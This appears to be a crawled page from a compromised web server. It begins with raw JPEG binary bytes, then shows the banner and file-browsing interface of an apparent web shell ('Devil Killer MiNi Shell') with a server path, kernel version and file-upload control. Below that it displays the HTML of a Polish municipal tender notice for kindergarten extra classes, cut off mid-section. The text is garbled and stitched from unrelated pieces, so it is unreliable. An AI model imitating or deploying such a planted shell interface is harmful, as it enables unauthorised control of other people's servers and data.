JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211022/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211022/0024247903-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie zajęć dodatkowych w Przedszkolu z Oddziałami Integracyjnymi Nr 430 w Warszawie, ul. Ceramiczna 9a w Dzielnicy Białołęka w podziale na części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Stołeczne Warszawa Dzielnica Białołęka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Modlińska197</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-122</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bialoleka.zp@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bialoleka.um.warszawa.pl/ https://zamowienia.um.warszawa.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie zajęć dodatkowych w Przedszkolu z Oddziałami Integracyjnymi Nr 430 w Warszawie, ul. Ceramiczna 9a w Dzielnicy Białołęka w podziale na części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-70244966-319f-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00242479</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002578/23/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.30 Dodatkowe zajęcia wyrównujące szanse edukacyjne dzieci w zakresie stwierdzonych deficytów realizowane w Przedszkolu z oddziałami integracyjnymi 430 w Dzielnicy Białołęka w podziale na części</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Europejski Fundusz Społeczny w ramach Regionalnego Programu Operacyjnego Woj. Mazowieckiego na lata 2014- 2020, w ramach Osi Priorytetowej X Edukacja dla rozwoju regionu, Działanie 10.1 Kształcenie i rozwój dzieci i młodzieży, Poddziałanie 10.1.4 Edukacja przedszkolna w ramach projektu „Podróż poza horyzonty - Przedszkole z Oddziałami Integracyjnymi 430” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-70244966-319f-11ec-a3fb-0a24f8cd532c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W przedmiotowym postępowaniu o udzielenie zamówienia Zamawiający korzysta z platformy Market Planet One Place, zwanej dalej platformą zakupową Zamawiającego.<br/>Wejście na platformę następuje poprzez link: <br/>https://zamowienia.um.warszawa.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://zamowienia.um.warszawa.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z pkt 16 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">zgodnie z pkt 16 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UD-II-WZP-271.43.2021.MLU.MRO/ TP1_u</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis Przedmiotu Zamówienia i termin jego realizacji<br/>1)	Zakres rzeczowy przedmiotu zamówienia obejmuje w szczególności przeprowadzenie zajęć dodatkowych w Przedszkolu z Oddziałami Integracyjnymi Nr 430 w Warszawie, ul. Ceramiczna 9a, określonych szczegółowo w Opisie Przedmiotu Zamówienia stanowiącym załącznik nr 1 do wzoru umowy.<br/>2)	Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia z najwyższą starannością, zgodnie z obowiązującymi przepisami, normami oraz do zapewnienia najwyższej jakości, prac towarzyszących usłudze.<br/>3)	Wykonawca nie może powierzyć w całości ani w części wykonania przedmiotu zamówienia osobom trzecim bez uprzedniej pisemnej zgody Zamawiającego. Wykonawca ponosi wobec Zamawiającego pełną odpowiedzialność za prace, które wykonuje przy pomocy podwykonawców. Wykonawca zobowiązuje się do zapłaty podwykonawcom wynagrodzenia na podstawie łączącego ich stosunku prawnego.<br/>Szczegółowy opis przedmiotu zamówienia zawiera wzór umowy (zał nr 8 do SWZ) w tym Opis przedmiotu zamówienia (zał nr 1 do wzoru umowy/załącznik nr 5 do SWZ).<br/>2.2.	Prawo opcji<br/>Zgodnie z art. 441 ustawy Zamawiający nie przewiduje skorzystania z prawa opcji.<br/>2.3	Wymagania w zakresie polisy ubezpieczeniowej<br/>Zamawiający wymaga, aby w całym okresie realizacji zamówienia osoby realizujące zamówienie były ubezpieczone od następstw nieszczęśliwych wypadków. Zamawiający wymaga od Wykonawcy, przedłożenia przed podpisaniem umowy polisy ubezpieczenia lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony zgodnie z wymogami wzoru umowy.<br/>2.4.	Wspólny Słownik Zamówień CPV<br/>Główny kod CPV: 80000000-4 Usługi edukacyjne i szkoleniowe<br/>2.5.	Termin realizacji zamówienia.<br/>Termin wykonania zamówienia: od daty podpisania umowy przez okres 12 miesięcy. <br/>Zajęcia będą prowadzone z wyłączeniem okresu wakacyjnego realizowanego w placówkach nieferyjnych na podstawie Rozporządzenia Ministra Edukacji Narodowej z dnia 17 marca 2017 r. w sprawie szczegółowej organizacji publicznych szkół i publicznych przedszkoli (Dz.U. z 2017r., poz. 649 ze zm.). Realizacja zajęć będzie się odbywać od poniedziałku do piątku w godzinach ustalonych z Dyrektorem przedszkola zgodnie <br/>z zatwierdzonym harmonogramem. Szczegółowy Harmonogram zajęć (stanowiący załącznik nr 5 do umowy) zostanie ustalony przed podpisaniem umowy z Wykonawcą. Zajęcia będą odbywać się poza godzinami podstawy programowej.<br/>Za „godzinę” rozumie się 45 minut przeprowadzonych zajęć dodatkowych.<br/>Szczegółowe warunki realizacji zamówienia zawiera wzór umowy.<br/>2.6.	Wartość zamówienia<br/>Zamawiający nie podaje na tym etapie kwoty na sfinansowanie zamówienia.<br/>2.7.	Gwarancja jakości<br/>Nie dotyczy.<br/>2.8.	Dodatkowe obowiązki Wykonawcy <br/>Zamawiający w przedmiotowym postępowaniu nie stosuje klauzuli społecznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W celu wyboru najkorzystniejszej oferty Zamawiający przyjął następujące kryteria:<br/>	cena brutto - za godzinę wykonanej usługi; waga kryterium - 60 %<br/>	kryterium jakościowe -40%<br/>Przyjmuje się, że 1% = 1 pkt i tak zostanie przeliczona liczba punktów w przyjętych kryteriach. Maksymalnie wykonawca może uzyskać 100 pkt.<br/>Komisja przetargowa przedstawi Kierownikowi Zamawiającego propozycję wyboru najkorzystniejszej oferty, czyli takiej, która uzyska największą całkowitą ilość punktów.<br/>8.2.	Zasady oceny ofert według ustalonych kryteriów <br/>1)	Wybór najkorzystniejszej oferty dokonany będzie spośród ofert, które nie zostały odrzucone.<br/>2)	Przy wyborze oferty najkorzystniejszej Zamawiający będzie kierował się jedynie kryteriami określonymi <br/>w ppkt 8.1 SIWZ. <br/>3)	Za najkorzystniejszą uznana zostanie oferta, która uzyska w sumie największą liczbę punktów <br/>w kryterium cena i doświadczenie zawodowe.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis Przedmiotu Zamówienia i termin jego realizacji<br/>1)	Zakres rzeczowy przedmiotu zamówienia obejmuje w szczególności przeprowadzenie zajęć dodatkowych w Przedszkolu z Oddziałami Integracyjnymi Nr 430 w Warszawie, ul. Ceramiczna 9a, określonych szczegółowo w Opisie Przedmiotu Zamówienia stanowiącym załącznik nr 1 do wzoru umowy.<br/>2)	Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia z najwyższą starannością, zgodnie z obowiązującymi przepisami, normami oraz do zapewnienia najwyższej jakości, prac towarzyszących usłudze.<br/>3)	Wykonawca nie może powierzyć w całości ani w części wykonania przedmiotu zamówienia osobom trzecim bez uprzedniej pisemnej zgody Zamawiającego. Wykonawca ponosi wobec Zamawiającego pełną odpowiedzialność za prace, które wykonuje przy pomocy podwykonawców. Wykonawca zobowiązuje się do zapłaty podwykonawcom wynagrodzenia na podstawie łączącego ich stosunku prawnego.<br/>Szczegółowy opis przedmiotu zamówienia zawiera wzór umowy (zał nr 8 do SWZ) w tym Opis przedmiotu zamówienia (zał nr 1 do wzoru umowy/załącznik nr 5 do SWZ).<br/>2.2.	Prawo opcji<br/>Zgodnie z art. 441 ustawy Zamawiający nie przewiduje skorzystania z prawa opcji.<br/>2.3	Wymagania w zakresie polisy ubezpieczeniowej<br/>Zamawiający wymaga, aby w całym okresie realizacji zamówienia osoby realizujące zamówienie były ubezpieczone od następstw nieszczęśliwych wypadków. Zamawiający wymaga od Wykonawcy, przedłożenia przed podpisaniem umowy polisy ubezpieczenia lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony zgodnie z wymogami wzoru umowy.<br/>2.4.	Wspólny Słownik Zamówień CPV<br/>Główny kod CPV: 80000000-4 Usługi edukacyjne i szkoleniowe<br/>2.5.	Termin realizacji zamówienia.<br/>Termin wykonania zamówienia: od daty podpisania umowy przez okres 12 miesięcy. <br/>Zajęcia będą prowadzone z wyłączeniem okresu wakacyjnego realizowanego w placówkach nieferyjnych na podstawie Rozporządzenia Ministra Edukacji Narodowej z dnia 17 marca 2017 r. w sprawie szczegółowej organizacji publicznych szkół i publicznych przedszkoli (Dz.U. z 2017r., poz. 649 ze zm.). Realizacja zajęć będzie się odbywać od poniedziałku do piątku w godzinach ustalonych z Dyrektorem przedszkola zgodnie <br/>z zatwierdzonym harmonogramem. Szczegółowy Harmonogram zajęć (stanowiący załącznik nr 5 do umowy) zostanie ustalony przed podpisaniem umowy z Wykonawcą. Zajęcia będą odbywać się poza godzinami podstawy programowej.<br/>Za „godzinę” rozumie się 45 minut przeprowadzonych zajęć dodatkowych.<br/>Szczegółowe warunki realizacji zamówienia zawiera wzór umowy.<br/>2.6.	Wartość zamówienia<br/>Zamawiający nie podaje na tym etapie kwoty na sfinansowanie zamówienia.<br/>2.7.	Gwarancja jakości<br/>Nie dotyczy.<br/>2.8.	Dodatkowe obowiązki Wykonawcy <br/>Zamawiający w przedmiotowym postępowaniu nie stosuje klauzuli społecznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W celu wyboru najkorzystniejszej oferty Zamawiający przyjął następujące kryteria:<br/>	cena brutto - za godzinę wykonanej usługi; waga kryterium - 60 %<br/>	kryterium jakościowe -40%<br/>Przyjmuje się, że 1% = 1 pkt i tak zostanie przeliczona liczba punktów w przyjętych kryteriach. Maksymalnie wykonawca może uzyskać 100 pkt.<br/>Komisja przetargowa przedstawi Kierownikowi Zamawiającego propozycję wyboru najkorzystniejszej oferty, czyli takiej, która uzyska największą całkowitą ilość punktów.<br/>8.2.	Zasady oceny ofert według ustalonych kryteriów <br/>1)	Wybór najkorzystniejszej oferty dokonany będzie spośród ofert, które nie zostały odrzucone.<br/>2)	Przy wyborze oferty najkorzystniejszej Zamawiający będzie kierował się jedynie kryteriami określonymi <br/>w ppkt 8.1 SIWZ. <br/>3)	Za najkorzystniejszą uznana zostanie oferta, która uzyska w sumie największą liczbę punktów <br/>w kryterium cena i doświadczenie zawodowe.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis Przedmiotu Zamówienia i termin jego realizacji<br/>1)	Zakres rzeczowy przedmiotu zamówienia obejmuje w szczególności przeprowadzenie zajęć dodatkowych w Przedszkolu z Oddziałami Integracyjnymi Nr 430 w Warszawie, ul. Ceramiczna 9a, określonych szczegółowo w Opisie Przedmiotu Zamówienia stanowiącym załącznik nr 1 do wzoru umowy.<br/>2)	Wykonawca zobowiązuje się do wykonania przedmiotu zamówienia z najwyższą starannością, zgodnie z obowiązującymi przepisami, normami oraz do zapewnienia najwyższej jakości, prac towarzyszących usłudze.<br/>3)	Wykonawca nie może powierzyć w całości ani w części wykonania przedmiotu zamówienia osobom trzecim bez uprzedniej pisemnej zgody Zamawiającego. Wykonawca ponosi wobec Zamawiającego pełną odpowiedzialność za prace, które wykonuje przy pomocy podwykonawców. Wykonawca zobowiązuje się do zapłaty podwykonawcom wynagrodzenia na podstawie łączącego ich stosunku prawnego.<br/>Szczegółowy opis przedmiotu zamówienia zawiera wzór umowy (zał nr 8 do SWZ) w tym Opis przedmiotu zamówienia (zał nr 1 do wzoru umowy/załącznik nr 5 do SWZ).<br/>2.2.	Prawo opcji<br/>Zgodnie z art. 441 ustawy Zamawiający nie przewiduje skorzystania z prawa opcji.<br/>2.3	Wymagania w zakresie polisy ubezpieczeniowej<br/>Zamawiający wymaga, aby w całym okresie realizacji zamówienia osoby realizujące zamówienie były ubezpieczone od następstw nieszczęśliwych wypadków. Zamawiający wymaga od Wykonawcy, przedłożenia przed podpisaniem umowy polisy ubezpieczenia lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony zgodnie z wymogami wzoru umowy.<br/>2.4.	Wspólny Słownik Zamówień CPV<br/>Główny kod CPV: 80000000-4 Usługi edukacyjne i szkoleniowe<br/>2.5.	Termin realizacji zamówienia.<br/>Termin wykonania zamówienia: od daty podpisania umowy przez okres 12 miesięcy. <br/>Zajęcia będą prowadzone z wyłączeniem okresu wakacyjnego realizowanego w placówkach nieferyjnych na podstawie Rozporządzenia Ministra Edukacji Narodowej z dnia 17 marca 2017 r. w sprawie szczegółowej organizacji publicznych szkół i publicznych przedszkoli (Dz.U. z 2017r., poz. 649 ze zm.). Realizacja zajęć będzie się odbywać od poniedziałku do piątku w godzinach ustalonych z Dyrektorem przedszkola zgodnie <br/>z zatwierdzonym harmonogramem. Szczegółowy Harmonogram zajęć (stanowiący załącznik nr 5 do umowy) zostanie ustalony przed podpisaniem umowy z Wykonawcą. Zajęcia będą odbywać się poza godzinami podstawy programowej.<br/>Za „godzinę” rozumie się 45 minut przeprowadzonych zajęć dodatkowych.<br/>Szczegółowe warunki realizacji zamówienia zawiera wzór umowy.<br/>2.6.	Wartość zamówienia<br/>Zamawiający nie podaje na tym etapie kwoty na sfinansowanie zamówienia.<br/>2.7.	Gwarancja jakości<br/>Nie dotyczy.<br/>2.8.	Dodatkowe obowiązki Wykonawcy <br/>Zamawiający w przedmiotowym postępowaniu nie stosuje klauzuli społecznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa 